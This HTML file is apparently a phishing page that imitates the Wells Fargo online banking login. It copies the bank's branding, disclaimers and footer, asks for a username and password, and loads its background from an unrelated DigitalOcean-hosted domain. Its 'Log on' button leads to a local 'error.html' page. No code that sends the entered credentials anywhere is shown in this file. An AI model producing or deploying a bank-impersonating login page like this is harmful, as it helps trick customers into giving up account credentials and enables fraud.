<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://fonts.cdnfonts.com/css/georgia-2" rel="stylesheet">

    <title>Wells Fargo Login</title>
    <style>
        section#bg-img {
    background: url('https://image-sq95w.ondigitalocean.app/bg.jpeg');
        padding: 21px;
}
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background-image: url('path-to-your-background-image.jpeg');
            background-size: cover;
            background-position: center;
        }

        .header {
            background-color: #d32f2f;
            color: white;
            padding: 25px 20px;
            display: flex;
            justify-content: space-around;
            align-items: center;
        }

        .header a {
            color: white;
            text-decoration: none;
            margin-left: 15px;
        }

 .login-container {
    background-color: white;
    padding: 20px;
    text-align: center;
    border-radius: 12px;
    box-shadow: 0 0 16px 0 rgba(59, 51, 49, .15);
    margin: 64px auto 54px;
    max-width: 870px;
    width: 83%;
    background-color: #fff;
    font-size: 15px;
    position: relative;
    z-index: 0;
}

        .login-container h1 {
                margin-bottom: 20px;
    color: #000;
    font-size: 34px;
    font-weight: 300;
        }

        .login-container input {
        width: 46%;
    padding: 18px;
    margin: 10px 0;
    border: 2px solid #ccc;
    border-radius: 20px;
    font-size: 20px;
    font-weight: 500;
        }

        .login-container input[type="checkbox"] {
            width: auto;
        }

        .login-container button {
            padding: 10px 15px;
    background-color: #d71e28;
    border: 1px solid #d71e28;
    border-radius: 24px;
    box-sizing: border-box;
    color: #fff;
    cursor: pointer;
    font-size: 1.0625rem;
    font-weight: 600;
    height: auto;
    line-height: 1.375rem;
    width: 18%;
        }

        .login-container button:disabled {
            background-color: #e2dede;
    border: 1px solid #e2dede;
    color: #b5adad;
    cursor: default;
    max-width: 100%;
    min-height: 40px;
    min-width: 176px;
    border-radius: 21px;
}
        }

        .footer {
            text-align: center;
            margin-top: 20px;
            font-size: 14px;
        }

        .footer p {
            margin: 5px 0;
        }

        .footer a {
            color: #d32f2f;
            text-decoration: none;

        }
        ul.Links__links___Nld90 li a {
    color: #000;
    font-size: 15px;
}

        .investment-info {
                background-color: #fff;
    margin: 38px auto;
    max-width: 860px;
    border: 1px solid #ccc;
    font-size: 18px;
    padding: 57px 33px;
    border-radius: 12px;
    box-shadow: 0 0 16px 0 rgba(59, 51, 49, .15);
        }
    .Links__links___Nld90 li {
    box-sizing: border-box;
    display: inline-block;
    margin: 0;
    padding-bottom: 24px;
}
.Links__links___Nld90 {
       display: flex
;
    flex-direction: row;
    flex-wrap: wrap;
    list-style: none;
    margin: 0 auto;
    max-width: 945px;
    gap: 5px;
}
    </style>
</head>
<body>
<div class="container">
    <div class="header">
      <span style="
    font-size: 28px;
">WELLS FARGO</span>
        <div>
            <a href="#">Enroll</a>
            <a href="#">Customer Service</a>
            <a href="#">ATMs/Locations</a>
            <a href="#">Español</a>
        </div>
    </div></div>
<section id=bg-img>
    

    <div class="login-container">
        <h1>Good evening</h1>
        <input type="text" placeholder="Username">
        <input type="password" placeholder="Password">
       <div style="
    width: 70%;
    font-size: 18px;
">
            <input type="checkbox" id="save-username">
            <label for="save-username">Save username</label>
        </div>
        <button 
        class="vertical-offset-xs text-center btn btn-block btn-lg btn-primary" 
        id="mfaLogonButton" 
        type="button" 
   >
      <a href="./error.html" style="
    color: #fff;
    text-decoration: none;
"> Log on
    </a>
    </button>
        <div class="footer">
            <a href="#">Forgot username or password?</a>
        </div>
    </div>

    <div class="investment-info">
        <p><b>Investment and Insurance Products are:</b></p>
        <ul>
            <li>Not Insured by the FDIC or Any Federal Government Agency</li>
            <li>Not a Deposit or Other Obligation of, or Guaranteed by, the Bank or Any Bank Affiliate</li>
            <li>Subject to Investment Risks, Including Possible Loss of the Principal Amount Invested</li>
        </ul>
    </div>
</section>
  <footer class="footer" style="
    background-color: #f4f0ed;
    border-top: 1px solid #b5adad;
    font-size: .8125rem;
    line-height: 1rem;
    padding: 32px 24px 24px;
">
       
        <ul class="Links__links___Nld90"><li class=""><a href="#"><span>About Wells Fargo |</span></a></li>
            <li class=""><a data-accessible-id="TGALVCVB" role="link" tabindex="0"><span>Online Access Agreement |</span></a>
            </li>
            <li class=""><a data-accessible-id="BOPZWDQX" role="link" tabindex="0"><span>Privacy, Cookies, Security &amp; Legal |</span></a></li>
            <li class=""><a data-accessible-id="OTUIVVAY" role="link" tabindex="0"><span>Do not sell or share my personal |information</span></a></li>
            <li class=""><a data-accessible-id="JTTAGMIJ" role="link" tabindex="0"><span>Notice of Data Collection |</span></a></li>
            <li class=""><a data-accessible-id="LQURVSXP" role="link" tabindex="0"><span>Report Email Fraud |</span></a></li>
            <li class=""><a data-accessible-id="HJOCWTOU" role="link" tabindex="0"><span>Security Center |</span></a></li>
            <li class=""><a data-accessible-id="GKKTMBJM" role="link" tabindex="0"><span>Sitemap |</span></a></li>
            <li class=""><a data-accessible-id="ZKXLRFER" role="link" tabindex="0"><span>Give Us Feedback |<span class="visuallyHidden"> (opens a dialog)</span></span></a></li></ul>
  
       
       
     <p style="
    text-align: center;
">© 1999 - 2024 Wells Fargo. All rights reserved. NMLSR ID 399801</p>
</footer>

</body>
</html>
